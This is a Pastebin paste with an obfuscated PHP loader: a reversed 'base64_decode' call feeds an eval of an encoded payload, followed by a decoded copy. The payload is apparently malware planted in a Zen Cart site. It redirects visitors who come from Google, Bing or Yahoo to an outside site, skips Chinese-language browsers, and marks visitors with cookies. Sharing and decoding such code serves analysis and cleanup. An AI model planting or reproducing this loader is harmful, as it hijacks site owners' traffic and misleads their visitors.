Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- function reverse($str){
- if($str == ''){
- return null;
- }
- if(strlen($str) == 1){
- return $str;
- }else{
- $string = "";
- for($i=1;$i<=strlen($str);$i++){
- $string .=substr($str,-$i,1);
- }
- return $string;
- }
- }
- $zencart=reverse("edoced_46esab");
- eval ($zencart('ZXJyb3JfcmVwb3J0aW5nKDcpOwokY2hlY2sgPSJzaGluZS1jaGVjayI7CiRjaGVjazIgPSJ0d290aW1lIjsKJGFkc2VuX2NvZGUgPScnOy8vsuXI67nIuOi547jmCiRDb29raWVUaW1lPTA7CmlmIChpc3NldCgkX0NPT0tJRVsiVVNFUklEIl0pIGFuZCAoICRfQ09PS0lFWyJVU0VSSUQiXT09JGNoZWNrICkgKQp7SGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3d3dy50aGVtYWdpY21vbWVudC5jby51ayIpO30KZWxzZSBpZiAoaXNzZXQoJF9DT09LSUVbIlVTRVJJRCJdKSBhbmQgKCAkX0NPT0tJRVsiVVNFUklEIl09PSRjaGVjazIpICkKewp9CmVsc2UKewokdGFyZ2V0X3VybD1hcnJheSgpOwovLyR0YXJnZXRfdXJsWzBdPSJodHRwIjsKZm9yKCRpPTA7JGk8Mzk7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Imh0dHA6Ly93d3cudGhlbWFnaWNtb21lbnQuY28udWsiOwp9CmZvcigkaT00MDskaTwxMDA7JGkrKykNCnsNCgkkdGFyZ2V0X3VybFskaV09Im1haWx0bzpoYWNrc2VvQHBvc3QuY29tIjsNCn0NCmZ1bmN0aW9uIHJhbmRfYXJyYXkoJGFycikgDQp7IA0KCSRhcnJfc2l6ZT1zaXplb2YoJGFycik7DQoJJHRtcF9hcnI9YXJyYXkoKTsgDQoJZm9yKCRpPTA7JGk8JGFycl9zaXplOyRpKyspeyANCgkJbXRfc3JhbmQoKGRvdWJsZSkgbWljcm90aW1lKCkqMTAwMDAwMCk7IA0KCQkkcmQ9bXRfcmFuZCgwLCRhcnJfc2l6ZS0xKTsgDQoJCWlmKCR0bXBfYXJyWyRyZF09PSIiKSANCgkJeyANCgkJCSR0bXBfYXJyWyRyZF09JGFyclskaV07IA0KCQl9IA0KCQllbHNlDQoJCXsgDQoJCQkkaT0kaS0xOyANCgkJfSANCgl9IA0KCXJldHVybiAkdG1wX2FycjsgDQp9DQokYXR0YWNrX3VybD1yYW5kX2FycmF5KCR0YXJnZXRfdXJsKTsNCiRhdHRhY2t1cmw9Ind3dyI7DQokbDE9JF9TRVJWRVJbIkhUVFBfQUNDRVBUX0xBTkdVQUdFIl07DQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKXsgDQokYTEgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107IA0KfSBlbHNlIHsgDQokYTEgPSAnJzsgDQp9IA0KJGwyPSJ6aCI7CiRhMj0iYmluZyI7CiRhMz0iY29tLmhrIjsKJGE1PSJnb29nbGUiOwokYTQ9InlhaG9vIjsKaWYgKCggc3RycG9zKCRsMSwkbDIpID09PSBmYWxzZSApYW5kKCAoIHN0cnBvcygkYTEsJGEzKSA9PSBmYWxzZSApKWFuZCgoIHN0cnBvcygkYTEsJGEyKSA9PSB0cnVlIClvciggc3RycG9zKCRhMSwkYTUpID09IHRydWUgKW9yKCBzdHJwb3MoJGExLCRhNCkgPT0gdHJ1ZSApKSBhbmQgKCBzdHJwb3MoJGF0dGFja191cmxbMV0sJGF0dGFja3VybCkgPT0gdHJ1ZSApKSB7CnNldGNvb2tpZSgiVVNFUklEIiwgInNoaW5lLWNoZWNrIiwgMCwiLyIsIiIpO0hlYWRlcigiTG9jYXRpb246ICRhdHRhY2tfdXJsWzFdIik7fQplbHNlCnsKc2V0Y29va2llKCJVU0VSSUQiLCAidHdvdGltZSIsIDAsIi8iLCIiKTsKfQp9'));
- ?><?php
- DECODED:
- error_reporting(7);
- $check ="shine-check";
- $check2 ="twotime";
- $adsen_code ='';//
- $CookieTime=0;
- if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check ) )
- {Header("Location: http://www.themagicmoment.co.uk");}
- else if (isset($_COOKIE["USERID"]) and ( $_COOKIE["USERID"]==$check2) )
- {
- }
- else
- {
- $target_url=array();
- //$target_url[0]="http";
- for($i=0;$i<39;$i++)
- {
- $target_url[$i]="http://www.themagicmoment.co.uk";
- }
- for($i=40;$i<100;$i++)
- {
- $target_url[$i]="mailto:hackseo@post.com";
- }
- function rand_array($arr)
- {
- $arr_size=sizeof($arr);
- $tmp_arr=array();
- for($i=0;$i<$arr_size;$i++){
- mt_srand((double) microtime()*1000000);
- $rd=mt_rand(0,$arr_size-1);
- if($tmp_arr[$rd]=="")
- {
- $tmp_arr[$rd]=$arr[$i];
- }
- else
- {
- $i=$i-1;
- }
- }
- return $tmp_arr;
- }
- $attack_url=rand_array($target_url);
- $attackurl="www";
- $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
- if(isset($_SERVER['HTTP_REFERER'])){
- $a1 = $_SERVER['HTTP_REFERER'];
- } else {
- $a1 = '';
- }
- $l2="zh";
- $a2="bing";
- $a3="com.hk";
- $a5="google";
- $a4="yahoo";
- if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
- setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
- else
- {
- setcookie("USERID", "twotime", 0,"/","");
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement